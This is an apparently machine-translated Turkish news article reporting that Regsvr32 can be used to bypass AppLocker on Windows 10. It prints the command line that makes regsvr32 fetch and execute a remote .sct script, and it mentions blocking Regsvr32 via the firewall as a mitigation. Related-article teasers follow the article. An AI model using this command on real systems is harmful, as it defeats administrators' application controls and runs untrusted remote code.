Regsvr32, Windows 10'daki applocker bypass atlamak için kullanılabilir
Video: regsvr32 windows 10 error code 0x80004005 module was loaded but the the call to dll register failed 2024
Colorado'dan bir isim, Casey Smith adındaki bir araştırmacı Regsvr32'nin Windows 10'da AppLocker'ı atlamak için kullanılabileceğini buldu ve bu bilgisayar kullanıcıları için, özellikle de iş ortamındakiler için büyük bir sorun.
AppLocker ilk olarak Windows 7 ve Windows Server 2008 R2'de tanıtıldı. Yöneticilerin, benzersiz dosya kimliğine bağlı olarak hangi grup veya kullanıcıların bazı uygulamalardan veya tüm uygulamalardan yararlanabileceğini belirlemelerine izin vermek için tasarlanmıştır. AppLocker'ı kullanma eğiliminde olan bir kişiyseniz, uygulamaların izlerini çalıştırmalarına veya durdurmalarına izin vermek için belirli kurallar oluşturmak için kullanılabileceğinin bilinmesi gerekir.
Farkında olmayanlar için, Regvr32 DLL'leri kaydetmek ve kaydını silmek için kullanılabilir. Bu, bir komut satırı yardımcı programı olarak gören tek tıklamalı bir araç değildir, bu nedenle yalnızca gelişmiş bilgisayar kullanıcılarının sunduğu olanaklardan yararlanmaya çalışmalıdır.
Bu tekniği kullanarak, bilgisayar sisteminin kayıt defterinde değişiklik yapmadığını biliyoruz, bu da yöneticilerin herhangi bir değişiklik yapılıp yapılmadığını bilmesini zorlaştırıyor.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
“Buradaki ilginç şey, regsvr32'nin zaten proxy farkında olması, TLS kullanması, yönlendirmeleri izlemesi vb.”. Ve… İmzalı, varsayılan bir MS ikilisi olduğunu tahmin ettiniz. Bu yüzden, yapmanız gereken tek şey,.sct dosyanızı kontrol ettiğiniz bir yerde barındırmak, ”diye yazdı.
Yukarıdaki teknik idari ayrıcalıklar gerektirmez ve kayıt defterini değiştirmez. Ayrıca, komut dosyaları hem HTTP hem de HTTPS üzerinden çağrılabilir. Şu anda, Microsoft bu küçük sorun için bir düzeltme eki yayınlamamıştır, bu nedenle bu noktada tek seçenek Regsvr32'yi Windows Güvenlik Duvarı üzerinden engellemektir.
İlginç bir şekilde, yazılım devi işletim sisteminin karşı karşıya olduğu bu güvenlik sorunu hakkında henüz cevap vermedi. Şimdi açıkta olduğu için, gelecekteki bir yama görüşmelerinin yanı sıra şirketten bir şeyler duymayı umuyoruz.
İçeriden atlamak için Windows 10 17627 (rs5) oluşturun - işte ne bekleniyor
Microsoft, Önümüzdeki İçerdekileri Atla için Windows 10 Build 17627 (RS5) 'i duyurdu ve altında ne getirdiğini göreceksiniz. Yapı herhangi bir yeni özellik ile dolu değil, ancak birkaç hata düzeltmeleri ve geliştirmeleri ile geliyor, bu yüzden kesinlikle kontrol etmeye değer. İşte bu sonda yer alan tüm yenilikler…
Windows 10 redstone 6 artık içerdekileri atlamak için kullanılabilir
Microsoft şimdi, Insiders'ın yaklaşmakta olan işletim sistemi sürümünü test etmesine izin veren ilk Redstone 6 derlemesi önizlemeleri için Ahead Skip ring kaydını açtı.
Applocker bypass istismarlarının bir sonraki ana pencere versiyonuyla düzeltilmesi
AppLocker, Windows OS ve Windows Sunucularında, yöneticilerin hangi kullanıcıların belirli uygulamaları çalıştırabileceğini kontrol etmelerini sağlayan bir özelliktir. Araç benzersiz dosya kimlikleri kullanır ve uygulamalara izin vermek veya engellemek için yöneticilerin kurallar oluşturmasını sağlar. AppLocker, yöneticilerin aşağıdaki uygulama türlerini kontrol etmelerini sağlar: çalıştırılabilir dosyalar (.exe ve .com), komut dosyaları (.js, .ps1, .vbs, .cmd,…
